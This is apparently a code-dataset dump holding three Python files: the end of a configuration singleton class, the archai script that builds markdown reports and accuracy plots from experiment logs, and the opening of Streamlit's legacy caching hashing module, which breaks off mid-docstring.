    class __ConfigBase:
        def __init__(self):
            # Docker CLI mode is signalled via LSCLI_DOCKER_SHARED_DIR; in
            # that mode output_dir is pinned to <shared dir>/build.
            self._docker_cli = bool(os.environ.get('LSCLI_DOCKER_SHARED_DIR', ''))
            self._output_dir = None
            if self._docker_cli:
                self._output_dir = os.path.join(os.environ.get('LSCLI_DOCKER_SHARED_DIR'), 'build')
            self._log_file = 'log.log'
            self._log_format = '%(asctime)s %(levelname)s %(name)s - %(message)s'
            self._log_date_format = '%H:%M:%S'
            self._log_count = 10
            self._log_type = 'plain'
            self._validate_certs = True
            self._debug = 0
            self._auto_approve = False
            self._offline_requirements = ''
            self._wait_for_pods = False
            self._upgrade_components = []
            self._vault_password_location = os.path.join(expanduser("~"), '.lambdastack/vault.cfg')

        @property
        def docker_cli(self):
            """True when running inside the dockerized CLI (read-only)."""
            return self._docker_cli

        @property
        def output_dir(self):
            return self._output_dir

        @output_dir.setter
        def output_dir(self, output_dir):
            # In docker mode the output dir is fixed and cannot be overridden.
            if not self._docker_cli and output_dir is not None:
                self._output_dir = output_dir

        @property
        def log_file(self):
            return self._log_file

        @log_file.setter
        def log_file(self, log_file):
            if log_file is not None:
                self._log_file = log_file

        @property
        def log_format(self):
            return self._log_format

        @log_format.setter
        def log_format(self, log_format):
            if log_format is not None:
                self._log_format = log_format

        @property
        def log_date_format(self):
            return self._log_date_format

        @log_date_format.setter
        def log_date_format(self, log_date_format):
            if log_date_format is not None:
                self._log_date_format = log_date_format

        @property
        def log_count(self):
            return self._log_count

        @log_count.setter
        def log_count(self, log_count):
            if log_count is not None:
                self._log_count = log_count

        @property
        def log_type(self):
            return self._log_type

        @log_type.setter
        def log_type(self, log_type):
            # Validated against LOG_TYPES; rejects unknown formats loudly.
            if log_type is not None:
                if log_type in LOG_TYPES:
                    self._log_type = log_type
                else:
                    raise InvalidLogTypeException(f'log_type "{log_type}" is not valid. Use one of: {LOG_TYPES}')

        @property
        def validate_certs(self):
            return self._validate_certs

        @validate_certs.setter
        def validate_certs(self, validate_certs):
            if validate_certs is not None:
                self._validate_certs = validate_certs

        @property
        def debug(self):
            return self._debug

        @debug.setter
        def debug(self, debug):
            if debug is not None:
                self._debug = debug

        @property
        def auto_approve(self):
            return self._auto_approve

        @auto_approve.setter
        def auto_approve(self, auto_approve):
            if auto_approve is not None:
                self._auto_approve = auto_approve

        @property
        def vault_password_location(self):
            return self._vault_password_location

        @vault_password_location.setter
        def vault_password_location(self, vault_password_location):
            if vault_password_location is not None:
                self._vault_password_location = vault_password_location

        @property
        def offline_requirements(self):
            return self._offline_requirements

        @offline_requirements.setter
        def offline_requirements(self, offline_requirements):
            if offline_requirements is not None:
                if not os.path.isdir(offline_requirements):
                    raise Exception(f'offline_requirements path "{offline_requirements}" is not a valid path.')
                # Ensure a trailing slash so Ansible copies the folder's
                # content (not the folder itself) to the repository host.
                if not offline_requirements.endswith('/'):
                    offline_requirements = f'{offline_requirements}/'
                self._offline_requirements = offline_requirements

        @property
        def wait_for_pods(self):
            return self._wait_for_pods

        @wait_for_pods.setter
        def wait_for_pods(self, wait_for_pods):
            if wait_for_pods is not None:
                self._wait_for_pods = wait_for_pods

        @property
        def upgrade_components(self):
            return self._upgrade_components

        @upgrade_components.setter
        def upgrade_components(self, upgrade_components):
            # Unlike the other setters this one accepts None intentionally.
            self._upgrade_components = upgrade_components

    # Shared singleton instance, created lazily on first construction.
    instance = None

    def __new__(cls):
        if Config.instance is None:
            Config.instance = Config.__ConfigBase()
        return Config.instance
| 31.269461
| 115
| 0.598238
|
4a1114d6ccaaedc99a5469ee56e5dc86a9b9384f
| 15,176
|
py
|
Python
|
scripts/reports/exprep.py
|
cclauss/archai
|
a5fb8f937f7f1319e3204120803b2a045e9f768b
|
[
"MIT"
] | 1
|
2020-10-03T18:18:41.000Z
|
2020-10-03T18:18:41.000Z
|
scripts/reports/exprep.py
|
cclauss/archai
|
a5fb8f937f7f1319e3204120803b2a045e9f768b
|
[
"MIT"
] | null | null | null |
scripts/reports/exprep.py
|
cclauss/archai
|
a5fb8f937f7f1319e3204120803b2a045e9f768b
|
[
"MIT"
] | null | null | null |
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import argparse
from typing import Dict, List, Type, Iterator, Tuple
import glob
import os
import pathlib
from collections import OrderedDict
import yaml
from inspect import getsourcefile
import re
from runstats import Statistics
import matplotlib
matplotlib.use('Agg')
import seaborn as sns
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
from archai.common import utils
from archai.common.ordereddict_logger import OrderedDictLogger
import re
def main():
    """Scan an experiment results tree and emit summary.md / details.md reports."""
    parser = argparse.ArgumentParser(description='Report creator')
    parser.add_argument('--results-dir', '-d', type=str,
                        #default=r'D:\GitHubSrc\archaiphilly\phillytools\darts_baseline_20200411',
                        default=r'~/logdir/report_test',
                        help='folder with experiment results from pt')
    parser.add_argument('--out-dir', '-o', type=str, default=r'~/logdir/reports',
                        help='folder to output reports')
    args, extra_args = parser.parse_known_args()

    # root dir where all results are stored
    results_dir = pathlib.Path(utils.full_path(args.results_dir))
    print(f'results_dir: {results_dir}')

    # extract experiment name which is top level directory
    exp_name = results_dir.parts[-1]

    # create results dir for experiment
    out_dir = utils.full_path(os.path.join(args.out_dir, exp_name))
    print(f'out_dir: {out_dir}')
    os.makedirs(out_dir, exist_ok=True)

    # get list of all structured logs for each job
    logs = {}
    job_count = 0
    for job_dir in results_dir.iterdir():
        job_count += 1
        for subdir in job_dir.iterdir():
            if not subdir.is_dir():
                continue
            # currently we expect that each job was ExperimentRunner job which should have
            # _search or _eval folders
            if subdir.stem.endswith('_search'):
                sub_job = 'search'
            elif subdir.stem.endswith('_eval'):
                sub_job = 'eval'
            else:
                raise RuntimeError(f'Sub directory "{subdir}" in job "{job_dir}" must '
                                   'end with either _search or _eval which '
                                   'should be the case if ExperimentRunner was used.')
            logs_filepath = os.path.join(str(subdir), 'logs.yaml')
            if os.path.isfile(logs_filepath):
                # repair known yaml corruption before parsing
                fix_yaml(logs_filepath)
                with open(logs_filepath, 'r') as f:
                    key = job_dir.name + ':' + sub_job
                    logs[key] = yaml.load(f, Loader=yaml.Loader)

    # create list of epoch nodes having same path in the logs
    grouped_logs = group_multi_runs(logs)
    collated_grouped_logs = collect_epoch_nodes(grouped_logs)
    summary_text, details_text = '', ''
    for log_key, grouped_logs in collated_grouped_logs.items():
        # for each path for epochs nodes, compute stats
        for node_path, logs_epochs_nodes in grouped_logs.items():
            collated_epoch_stats = get_epoch_stats(node_path, logs_epochs_nodes)
            summary_text += get_summary_text(log_key, out_dir, node_path, collated_epoch_stats, len(logs_epochs_nodes))
            details_text += get_details_text(log_key, out_dir, node_path, collated_epoch_stats, len(logs_epochs_nodes))

    # write_report picks summary_text/details_text out of vars()
    write_report('summary.md', **vars())
    write_report('details.md', **vars())
def epoch_nodes(node: OrderedDict, path=None) -> Iterator[Tuple[List[str], OrderedDict]]:
    """Search nodes recursively for nodes named 'epochs' and yield them with their paths.

    A node qualifies when it is a non-empty OrderedDict that contains the
    epoch key '0'. Fix vs. original: the default ``path=[]`` was a shared
    mutable default argument; replaced with the ``None`` sentinel idiom
    (behavior unchanged — the list was never mutated in place).
    """
    if path is None:
        path = []
    for key, child in node.items():
        if key == 'epochs' and isinstance(child, OrderedDict) and len(child) and '0' in child:
            yield path, child
        elif isinstance(child, OrderedDict):  # recurse into nested sections
            yield from epoch_nodes(child, path=path + [key])
def fix_yaml(filepath: str):
    """Strip known-bad line sequences that make the yaml unloadable.

    If anything was removed, the untouched original is saved next to the
    file as ``<filepath>.original.yaml`` before rewriting.

    Fix vs. original: the local holding the file content was named
    ``yaml``, shadowing the imported ``yaml`` module; renamed to avoid the
    confusion (behavior unchanged).
    """
    content = pathlib.Path(filepath).read_text()
    bad_lines = [
        r'get: !!python/object/apply:builtins.getattr',
        r'- *id001',
        r'  - get'
    ]
    # form pattern by joining escaped literals with \s+ so any whitespace
    # (newlines, indentation) between the bad lines matches
    # Note: don't use re.escape on the final pattern as it cannot be used in re.sub
    pattern = r'\s+'.join([re.escape(l) for l in bad_lines])
    fixed_content = re.sub(pattern, '', content)
    if content != fixed_content:
        backup = pathlib.Path(filepath + '.original.yaml')
        assert not backup.exists(), f'Backup file {backup} should not exist'
        backup.write_text(content)
        pathlib.Path(filepath).write_text(fixed_content)
        print(f'Yaml at {filepath} was fixed')
def remove_seed_part(log_key: str) -> str:
    """Drop any 'seed<number>' fragment from a run key.

    Matches 'seed' plus an optional underscore plus an int or float, e.g.
    seed123, seed123.4, seed_123, seed_123.4.
    """
    seed_pattern = r'seed\_?([0-9]*[.])?[0-9]+'
    return re.sub(seed_pattern, '', log_key)
def group_multi_runs(logs: Dict[str, OrderedDict]) -> Dict[str, List[OrderedDict]]:
    """Bucket per-seed logs under a seed-stripped key, preserving order."""
    grouped: Dict[str, List[OrderedDict]] = {}
    for log_key, log in logs.items():
        bucket_key = remove_seed_part(log_key)
        grouped.setdefault(bucket_key, []).append(log)
    return grouped
def collect_epoch_nodes(grouped_logs: Dict[str, List[OrderedDict]]) -> Dict[str, Dict[str, List[OrderedDict]]]:
    """For each run group, gather epoch nodes that live at the same log path.

    Result maps run-group key -> ('/'-joined path -> list of epoch nodes,
    one per seed run).
    """
    collated: Dict[str, Dict[str, List[OrderedDict]]] = {}
    for log_key, logs in grouped_logs.items():
        by_path: Dict[str, List[OrderedDict]] = {}
        for log in logs:
            for path, epoch_node in epoch_nodes(log):
                by_path.setdefault('/'.join(path), []).append(epoch_node)
        collated[log_key] = by_path
    return collated
class EpochStats:
    """Statistics aggregated across seed runs for one epoch index."""

    def __init__(self) -> None:
        self.start_lr = Statistics()
        self.end_lr = Statistics()
        self.train_fold = FoldStats()
        self.val_fold = FoldStats()

    def update(self, epoch_node: OrderedDict) -> None:
        """Fold one run's epoch node into the running statistics."""
        self.start_lr.push(epoch_node['start_lr'])
        if 'train' in epoch_node:
            train_node = epoch_node['train']
            self.end_lr.push(train_node['end_lr'])
            self.train_fold.update(train_node)
        if 'val' in epoch_node:
            self.val_fold.update(epoch_node['val'])
class FoldStats:
    """Accuracy and timing statistics for one fold (train or val)."""

    def __init__(self) -> None:
        self.top1 = Statistics()
        self.top5 = Statistics()
        self.duration = Statistics()
        self.step_time = Statistics()

    def update(self, fold_node: OrderedDict) -> None:
        """Push one fold's metrics; duration/step_time are optional keys."""
        self.top1.push(fold_node['top1'])
        self.top5.push(fold_node['top5'])
        for optional_key in ('duration', 'step_time'):
            if optional_key in fold_node:
                getattr(self, optional_key).push(fold_node[optional_key])
def stat2str(stat:Statistics)->str:
    """Render a Statistics as '<mean>' plus a superscript '± stddev' when
    more than one sample was pushed; '-' when empty."""
    if not len(stat):
        return '-'
    rendered = f'{stat.mean():.4f}'
    if len(stat) > 1:
        rendered += f'<sup> ± {stat.stddev():.4f}</sup>'
    return rendered
def get_epoch_stats(node_path:str, logs_epochs_nodes:List[OrderedDict])->List[EpochStats]:
    """Collate per-epoch statistics across all seed runs of one metric path."""
    stats: List[EpochStats] = []
    for epochs_node in logs_epochs_nodes:
        for epoch_key, epoch_node in epochs_node.items():
            # epoch containers may hold non-numeric keys; skip those
            if not str.isnumeric(epoch_key):
                continue
            idx = int(epoch_key)
            if idx >= len(stats):
                stats.append(EpochStats())
            stats[idx].update(epoch_node)
    return stats
def get_valid_filename(s):
    """Sanitize *s* for use as a filename: strip, spaces become '_', and
    everything except word characters, '-' and '.' is dropped."""
    cleaned = str(s).strip().replace(' ', '_')
    return re.sub(r'(?u)[^-\w.]', '', cleaned)
def get_summary_text(log_key:str, out_dir:str, node_path:str, epoch_stats:List[EpochStats], seed_runs:int)->str:
    """Render the markdown summary section for one (run, metric-path) pair.

    Side effect: saves the per-epoch accuracy plot as a PNG in out_dir.
    """
    lines = ['','']
    lines.append(f'## Run: {log_key}\n')
    lines.append(f'### Metric Type: {node_path}\n')
    lines.append(f'Number of epochs: {len(epoch_stats)}\n')
    lines.append(f'Number of seeds: {seed_runs}\n')
    lines.append('\n')
    # plot file is named after the (sanitized) metric path
    plot_filename = get_valid_filename(node_path)+'.png'
    plot_filepath = os.path.join(out_dir, plot_filename)
    plot_epochs(epoch_stats, plot_filepath)
    lines.append('')
    # total train time = sum of the per-epoch duration statistics
    train_duration = Statistics()
    for epoch_stat in epoch_stats:
        train_duration += epoch_stat.train_fold.duration
    # NOTE(review): f'' appends an empty line — looks like a lost markdown
    # image embed for plot_filename; confirm against file history.
    lines.append(f'')
    lines.append(f'Train epoch time: {stat2str(train_duration)}')
    lines.append('')
    # report val top1 at fixed milestones the run reached
    milestones = [35, 200, 600, 1500]
    for milestone in milestones:
        if len(epoch_stats) >= milestone:
            lines.append(f'{stat2str(epoch_stats[milestone-1].val_fold.top1)} val top1 @ {milestone} epochs\n')
    # last epoch
    if not len(epoch_stats) in milestones:
        lines.append(f'{stat2str(epoch_stats[-1].val_fold.top1)} val top1 @ {len(epoch_stats)} epochs\n')
    return '\n'.join(lines)
def get_details_text(log_key:str, out_dir:str, node_path:str, epoch_stats:List[EpochStats], seed_runs:int)->str:
    """Render the per-epoch markdown table for one (run, metric-path) pair."""
    lines = ['','']
    lines.append(f'## Run: {log_key}\n')
    lines.append(f'### Metric Type: {node_path}\n')
    lines.append(f'Number of seeds: {seed_runs}\n')
    # markdown table header and alignment row
    lines.append('|Epoch |Val Top1 |Val Top5 |Train Top1 |Train Top5 |Train Duration |Val Duration |Train Step Time |Val Step Time |StartLR |EndLR |')
    lines.append('|---|---|---|---|---|---|---|---|---|---|---|')
    # one row per epoch, each cell formatted as mean (± stddev) or '-'
    for i, epoch_stat in enumerate(epoch_stats):
        line = '|'
        line += str(i) + '|'
        line += stat2str(epoch_stat.val_fold.top1) + '|'
        line += stat2str(epoch_stat.val_fold.top5) + '|'
        line += stat2str(epoch_stat.train_fold.top1) + '|'
        line += stat2str(epoch_stat.train_fold.top5) + '|'
        line += stat2str(epoch_stat.train_fold.duration) + '|'
        line += stat2str(epoch_stat.val_fold.duration) + '|'
        line += stat2str(epoch_stat.train_fold.step_time) + '|'
        line += stat2str(epoch_stat.val_fold.step_time) + '|'
        line += stat2str(epoch_stat.start_lr) + '|'
        line += stat2str(epoch_stat.end_lr) + '|'
        lines.append(line)
    return '\n'.join(lines)
def plot_epochs(epoch_stats:List[EpochStats], filepath:str):
    """Plot mean ± stddev bands and min/max envelopes of train/val top1/top5
    across epochs and save the figure to `filepath`.

    Fixes vs. original: the train_top5 min/max lists were computed from
    ``train_fold.top1`` (copy-paste bug), so the top5 envelope showed top1
    extremes; also the unguarded ``.mean()`` calls now use the same
    empty-statistics guard as the top1 lists for consistency.
    """
    plt.ioff()
    plt.clf()
    fig, ax = plt.subplots()
    clrs = sns.color_palette("husl", 5)
    with sns.axes_style("darkgrid"):
        # each entry: (means, stddevs, label, minima, maxima), one value per epoch
        metrics = []
        val_top1_means = [es.val_fold.top1.mean() if len(es.val_fold.top1)>0 else 0 for es in epoch_stats]
        val_top1_std = [es.val_fold.top1.stddev() if len(es.val_fold.top1)>1 else 0 for es in epoch_stats]
        val_top1_min = [es.val_fold.top1.minimum() if len(es.val_fold.top1)>0 else 0 for es in epoch_stats]
        val_top1_max = [es.val_fold.top1.maximum() if len(es.val_fold.top1)>0 else 0 for es in epoch_stats]
        metrics.append((val_top1_means, val_top1_std, 'val_top1', val_top1_min, val_top1_max))
        val_top5_means = [es.val_fold.top5.mean() if len(es.val_fold.top5)>0 else 0 for es in epoch_stats]
        val_top5_std = [es.val_fold.top5.stddev() if len(es.val_fold.top5)>1 else 0 for es in epoch_stats]
        val_top5_min = [es.val_fold.top5.minimum() if len(es.val_fold.top5)>0 else 0 for es in epoch_stats]
        val_top5_max = [es.val_fold.top5.maximum() if len(es.val_fold.top5)>0 else 0 for es in epoch_stats]
        metrics.append((val_top5_means, val_top5_std, 'val_top5', val_top5_min, val_top5_max))
        train_top1_means = [es.train_fold.top1.mean() if len(es.train_fold.top1)>0 else 0 for es in epoch_stats]
        train_top1_std = [es.train_fold.top1.stddev() if len(es.train_fold.top1)>1 else 0 for es in epoch_stats]
        train_top1_min = [es.train_fold.top1.minimum() if len(es.train_fold.top1)>0 else 0 for es in epoch_stats]
        train_top1_max = [es.train_fold.top1.maximum() if len(es.train_fold.top1)>0 else 0 for es in epoch_stats]
        metrics.append((train_top1_means, train_top1_std, 'train_top1', train_top1_min, train_top1_max))
        train_top5_means = [es.train_fold.top5.mean() if len(es.train_fold.top5)>0 else 0 for es in epoch_stats]
        train_top5_std = [es.train_fold.top5.stddev() if len(es.train_fold.top5)>1 else 0 for es in epoch_stats]
        # BUG FIX: these two previously read train_fold.top1
        train_top5_min = [es.train_fold.top5.minimum() if len(es.train_fold.top5)>0 else 0 for es in epoch_stats]
        train_top5_max = [es.train_fold.top5.maximum() if len(es.train_fold.top5)>0 else 0 for es in epoch_stats]
        metrics.append((train_top5_means, train_top5_std, 'train_top5', train_top5_min, train_top5_max))

        for i, metric in enumerate(metrics):
            ax.plot(range(len(metric[0])), metric[0], label=metric[2], c=clrs[i])
            # ± stddev band
            ax.fill_between(range(len(metric[0])), np.subtract(metric[0], metric[1]),
                            np.add(metric[0], metric[1]),
                            alpha=0.5, facecolor=clrs[i])
            # faint min/max envelope
            ax.fill_between(range(len(metric[0])), metric[3],
                            metric[4],
                            alpha=0.1, facecolor=clrs[i])
        ax.set_xlabel('Epoch')
        ax.set_ylabel('Accuracy')
        ax.set_title('Accuracy Metrics')
        ax.legend()
        ax.grid('on')

        # add more ticks
        #ax.set_xticks(np.arange(max([len(m) for m in metrics])))
        # remove tick marks
        # ax.xaxis.set_tick_params(size=0)
        # ax.yaxis.set_tick_params(size=0)
        # change the color of the top and right spines to opaque gray
        # ax.spines['right'].set_color((.8,.8,.8))
        # ax.spines['top'].set_color((.8,.8,.8))

        # tweak the axis labels
        xlab = ax.xaxis.get_label()
        ylab = ax.yaxis.get_label()
        xlab.set_style('italic')
        xlab.set_size(10)
        ylab.set_style('italic')
        ylab.set_size(10)
        # tweak the title
        ttl = ax.title
        ttl.set_weight('bold')
    plt.savefig(filepath)
    plt.close()
def write_report(template_filename: str, **kwargs) -> None:
    """Render a report template with **kwargs and write it to kwargs['out_dir'].

    The template is looked up next to this script file and formatted with
    str.format using the supplied keyword arguments.
    """
    # getsourcefile(lambda: 0) yields this file's path even when __file__ is absent.
    script_dir = os.path.dirname(os.path.abspath(getsourcefile(lambda: 0)))
    template_path = pathlib.Path(script_dir) / template_filename
    report = template_path.read_text().format(**kwargs)
    outfilepath = os.path.join(kwargs['out_dir'], template_filename)
    with open(outfilepath, 'w', encoding='utf-8') as f:
        f.write(report)
    print(f'report written to: {outfilepath}')
if __name__ == '__main__':
    # Script entry point — delegates to main(), defined elsewhere in this file.
    main()
| 41.922652
| 174
| 0.621837
|
4a11152ca545171b216d21463263b45e6ff6396e
| 35,206
|
py
|
Python
|
lib/streamlit/legacy_caching/hashing.py
|
sourcery-ai-bot/streamlit
|
cbfa69c8ec310a839148cfa4bac5697e6f392a79
|
[
"Apache-2.0"
] | null | null | null |
lib/streamlit/legacy_caching/hashing.py
|
sourcery-ai-bot/streamlit
|
cbfa69c8ec310a839148cfa4bac5697e6f392a79
|
[
"Apache-2.0"
] | null | null | null |
lib/streamlit/legacy_caching/hashing.py
|
sourcery-ai-bot/streamlit
|
cbfa69c8ec310a839148cfa4bac5697e6f392a79
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2018-2022 Streamlit Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A hashing utility for code."""
import collections
import dis
import enum
import functools
import hashlib
import importlib
import inspect
import io
import os
import pickle
import sys
import tempfile
import textwrap
import threading
import typing
import weakref
from typing import Any, List, Pattern, Optional, Dict, Callable, Union
import unittest.mock
from streamlit import config
from streamlit import file_util
from streamlit import type_util
from streamlit import util
from streamlit.errors import StreamlitAPIException, MarkdownFormattedException
from streamlit.folder_black_list import FolderBlackList
from streamlit.logger import get_logger
from streamlit.uploaded_file_manager import UploadedFile
_LOGGER = get_logger(__name__)
# If a dataframe has more than this many rows, we consider it large and hash a sample.
_PANDAS_ROWS_LARGE = 100000
_PANDAS_SAMPLE_SIZE = 10000
# Similar to dataframes, we also sample large numpy arrays.
_NP_SIZE_LARGE = 1000000
_NP_SAMPLE_SIZE = 100000
# Arbitrary item to denote where we found a cycle in a hashed object.
# This allows us to hash self-referencing lists, dictionaries, etc.
_CYCLE_PLACEHOLDER = b"streamlit-57R34ML17-hesamagicalponyflyingthroughthesky-CYCLE"
# This needs to be initialized lazily to avoid calling config.get_option() and
# thus initializing config options when this file is first imported.
_FOLDER_BLACK_LIST = None
# FFI objects (objects that interface with C libraries) can be any of these types:
_FFI_TYPE_NAMES = [
"_cffi_backend.FFI",
"builtins.CompiledFFI",
]
# KERAS objects can be any of these types:
_KERAS_TYPE_NAMES = [
"keras.engine.training.Model",
"tensorflow.python.keras.engine.training.Model",
"tensorflow.python.keras.engine.functional.Functional",
]
Context = collections.namedtuple("Context", ["globals", "cells", "varnames"])
# Mapping of types or fully qualified names to hash functions. This is used to
# override the behavior of the hasher inside Streamlit's caching mechanism:
# when the hasher encounters an object, it will first check to see if its type
# matches a key in this dict and, if so, will use the provided function to
# generate a hash for it.
HashFuncsDict = Dict[Union[str, typing.Type[Any]], Callable[[Any], Any]]
class HashReason(enum.Enum):
    """Why the hasher was invoked; used to phrase user-facing error messages."""

    CACHING_FUNC_ARGS = 0  # hashing a cached function's arguments
    CACHING_FUNC_BODY = 1  # hashing a cached function's body/code
    CACHING_FUNC_OUTPUT = 2  # hashing a cached function's return value
    CACHING_BLOCK = 3  # hashing an st.Cache code block
def update_hash(
    val: Any,
    hasher,
    hash_reason: HashReason,
    hash_source: Callable[..., Any],
    context: Optional[Context] = None,
    hash_funcs: Optional[HashFuncsDict] = None,
) -> None:
    """Feed the hash of ``val`` into ``hasher``.

    This is the main entrypoint to hashing.py.
    """
    # Record why/for-what we're hashing on the calling thread's stack so
    # error messages can describe the context.
    stack = hash_stacks.current
    stack.hash_reason = hash_reason
    stack.hash_source = hash_source

    _CodeHasher(hash_funcs).update(hasher, val, context)
class _HashStack:
"""Stack of what has been hashed, for debug and circular reference detection.
This internally keeps 1 stack per thread.
Internally, this stores the ID of pushed objects rather than the objects
themselves because otherwise the "in" operator inside __contains__ would
fail for objects that don't return a boolean for "==" operator. For
example, arr == 10 where arr is a NumPy array returns another NumPy array.
This causes the "in" to crash since it expects a boolean.
"""
def __init__(self):
self._stack: collections.OrderedDict[int, List[Any]] = collections.OrderedDict()
# The reason why we're doing this hashing, for debug purposes.
self.hash_reason: Optional[HashReason] = None
# Either a function or a code block, depending on whether the reason is
# due to hashing part of a function (i.e. body, args, output) or an
# st.Cache codeblock.
self.hash_source: Optional[Callable[..., Any]] = None
def __repr__(self) -> str:
return util.repr_(self)
def push(self, val: Any):
self._stack[id(val)] = val
def pop(self):
self._stack.popitem()
def __contains__(self, val: Any):
return id(val) in self._stack
def pretty_print(self):
def to_str(v):
try:
return "Object of type %s: %s" % (type_util.get_fqn_type(v), str(v))
except:
return "<Unable to convert item to string>"
# IDEA: Maybe we should remove our internal "hash_funcs" from the
# stack. I'm not removing those now because even though those aren't
# useful to users I think they might be useful when we're debugging an
# issue sent by a user. So let's wait a few months and see if they're
# indeed useful...
return "\n".join(to_str(x) for x in reversed(self._stack.values()))
class _HashStacks:
    """Holds one _HashStack per thread, created lazily on first access."""

    def __init__(self):
        # Weak keys so finished threads don't keep their stacks alive.
        self._stacks: weakref.WeakKeyDictionary[
            threading.Thread, _HashStack
        ] = weakref.WeakKeyDictionary()

    def __repr__(self) -> str:
        return util.repr_(self)

    @property
    def current(self) -> _HashStack:
        """Return the stack belonging to the calling thread."""
        thread = threading.current_thread()
        if thread not in self._stacks:
            self._stacks[thread] = _HashStack()
        return self._stacks[thread]
hash_stacks = _HashStacks()
class _Cells:
"""
This is basically a dict that allows us to push/pop frames of data.
Python code objects are nested. In the following function:
@st.cache()
def func():
production = [[x + y for x in range(3)] for y in range(5)]
return production
func.__code__ is a code object, and contains (inside
func.__code__.co_consts) additional code objects for the list
comprehensions. Those objects have their own co_freevars and co_cellvars.
What we need to do as we're traversing this "tree" of code objects is to
save each code object's vars, hash it, and then restore the original vars.
"""
_cell_delete_obj = object()
def __init__(self):
self.values = {}
self.stack = []
self.frames = []
def __repr__(self) -> str:
return util.repr_(self)
def _set(self, key, value):
"""
Sets a value and saves the old value so it can be restored when
we pop the frame. A sentinel object, _cell_delete_obj, indicates that
the key was previously empty and should just be deleted.
"""
# save the old value (or mark that it didn't exist)
self.stack.append((key, self.values.get(key, self._cell_delete_obj)))
# write the new value
self.values[key] = value
def pop(self):
"""Pop off the last frame we created, and restore all the old values."""
idx = self.frames.pop()
for key, val in self.stack[idx:]:
if val is self._cell_delete_obj:
del self.values[key]
else:
self.values[key] = val
self.stack = self.stack[:idx]
def push(self, code, func=None):
"""Create a new frame, and save all of `code`'s vars into it."""
self.frames.append(len(self.stack))
for var in code.co_cellvars:
self._set(var, var)
if code.co_freevars:
if func is not None:
assert len(code.co_freevars) == len(func.__closure__)
for var, cell in zip(code.co_freevars, func.__closure__):
self._set(var, cell.cell_contents)
else:
# List comprehension code objects also have freevars, but they
# don't have a surrouding closure. In these cases we just use the name.
for var in code.co_freevars:
self._set(var, var)
def _get_context(func) -> Context:
    """Build the name-resolution Context for hashing ``func``'s code."""
    # Bound methods resolve "self" to the instance they're bound to.
    if inspect.ismethod(func):
        varnames = {"self": func.__self__}
    else:
        varnames = {}
    return Context(globals=func.__globals__, cells=_Cells(), varnames=varnames)
def _int_to_bytes(i: int) -> bytes:
num_bytes = (i.bit_length() + 8) // 8
return i.to_bytes(num_bytes, "little", signed=True)
def _key(obj: Optional[Any]) -> Any:
"""Return key for memoization."""
if obj is None:
return None
def is_simple(obj):
return (
isinstance(obj, bytes)
or isinstance(obj, bytearray)
or isinstance(obj, str)
or isinstance(obj, float)
or isinstance(obj, int)
or isinstance(obj, bool)
or obj is None
)
if is_simple(obj):
return obj
if isinstance(obj, tuple):
if all(map(is_simple, obj)):
return obj
if isinstance(obj, list):
if all(map(is_simple, obj)):
return ("__l", tuple(obj))
if (
type_util.is_type(obj, "pandas.core.frame.DataFrame")
or type_util.is_type(obj, "numpy.ndarray")
or inspect.isbuiltin(obj)
or inspect.isroutine(obj)
or inspect.iscode(obj)
):
return id(obj)
return NoResult
class _CodeHasher:
    """A hasher that can hash code objects including dependencies."""

    def __init__(self, hash_funcs: Optional[HashFuncsDict] = None):
        """Create a hasher, optionally with user-supplied per-type hash functions."""
        # Can't use types as the keys in the internal _hash_funcs because
        # we always remove user-written modules from memory when rerunning a
        # script in order to reload it and grab the latest code changes.
        # (See LocalSourcesWatcher.py:on_file_changed) This causes
        # the type object to refer to different underlying class instances each run,
        # so type-based comparisons fail. To solve this, we use the types converted
        # to fully-qualified strings as keys in our internal dict.
        self._hash_funcs: HashFuncsDict
        if hash_funcs:
            self._hash_funcs = {
                k if isinstance(k, str) else type_util.get_fqn(k): v
                for k, v in hash_funcs.items()
            }
        else:
            self._hash_funcs = {}
        # Memo table mapping (type name, _key(obj)) -> hash bytes.
        self._hashes: Dict[Any, bytes] = {}
        # The number of the bytes in the hash.
        self.size = 0

    def __repr__(self) -> str:
        return util.repr_(self)

    def to_bytes(self, obj: Any, context: Optional[Context] = None) -> bytes:
        """Add memoization to _to_bytes and protect against cycles in data structures."""
        tname = type(obj).__qualname__.encode()
        key = (tname, _key(obj))
        # Memoize if possible.
        if key[1] is not NoResult and key in self._hashes:
            return self._hashes[key]
        # Break recursive cycles.
        if obj in hash_stacks.current:
            return _CYCLE_PLACEHOLDER
        hash_stacks.current.push(obj)
        try:
            # Hash the input
            b = b"%s:%s" % (tname, self._to_bytes(obj, context))
            # Hmmm... It's possible that the size calculation is wrong. When we
            # call to_bytes inside _to_bytes things get double-counted.
            self.size += sys.getsizeof(b)
            if key[1] is not NoResult:
                self._hashes[key] = b
        except (UnhashableTypeError, UserHashError, InternalHashError):
            # Re-raise exceptions we hand-raise internally.
            raise
        except BaseException as e:
            raise InternalHashError(e, obj)
        finally:
            # In case an UnhashableTypeError (or other) error is thrown, clean up the
            # stack so we don't get false positives in future hashing calls
            hash_stacks.current.pop()
        return b

    def update(self, hasher, obj: Any, context: Optional[Context] = None) -> None:
        """Update the provided hasher with the hash of an object."""
        b = self.to_bytes(obj, context)
        hasher.update(b)

    def _file_should_be_hashed(self, filename: str) -> bool:
        """Return True if code from *filename* should be hashed by content:
        i.e. it is not in a blacklisted folder and lives under the main
        script's directory or on the Python path."""
        global _FOLDER_BLACK_LIST
        # Initialized lazily so config options aren't read at import time.
        if not _FOLDER_BLACK_LIST:
            _FOLDER_BLACK_LIST = FolderBlackList(
                config.get_option("server.folderWatchBlacklist")
            )
        filepath = os.path.abspath(filename)
        file_is_blacklisted = _FOLDER_BLACK_LIST.is_blacklisted(filepath)
        # Short circuiting for performance.
        if file_is_blacklisted:
            return False
        return file_util.file_is_in_folder_glob(
            filepath, self._get_main_script_directory()
        ) or file_util.file_in_pythonpath(filepath)

    def _to_bytes(self, obj: Any, context: Optional[Context]) -> bytes:
        """Hash objects to bytes, including code with dependencies.

        Python's built in `hash` does not produce consistent results across
        runs.

        NOTE: branch order matters — e.g. UploadedFile must be tested before
